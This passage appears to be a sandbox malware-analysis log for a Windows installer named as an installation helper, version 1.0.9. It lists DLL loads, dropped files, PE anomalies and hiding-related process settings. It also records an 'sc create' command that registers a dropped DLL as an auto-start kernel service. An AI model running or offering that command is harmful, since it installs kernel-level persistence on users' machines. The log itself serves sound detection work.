Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic file information: File size 5707684 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1831583959.0000000003740000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1831723417.0000000000BF0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00A757D0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.1.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: real checksum: 0x0 should be: 0x579ef1
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.1.drStatic PE information: section name: .00cfg
Source: update.vac.1.drStatic PE information: section name: .voltbl
Source: update.vac.1.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .=~
Source: is-B21TE.tmp.6.drStatic PE information: section name: .xdata
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C1686EB push ecx; ret 6_2_6C1686FE
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C010F00 push ss; retn 0001h6_2_6C010F0A
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C236F10 push eax; ret 6_2_6C236F2E
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C19B9F4 push 004AC35Ch; ret 6_2_6C19BA0E
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C237290 push eax; ret 6_2_6C2372BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F45F4 push 00A9C35Ch; ret 10_2_009F460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8FB10 push eax; ret 10_2_00A8FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8FE90 push eax; ret 10_2_00A8FEBE
Source: update.vac.1.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeFile created: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\is-B21TE.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeFile created: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
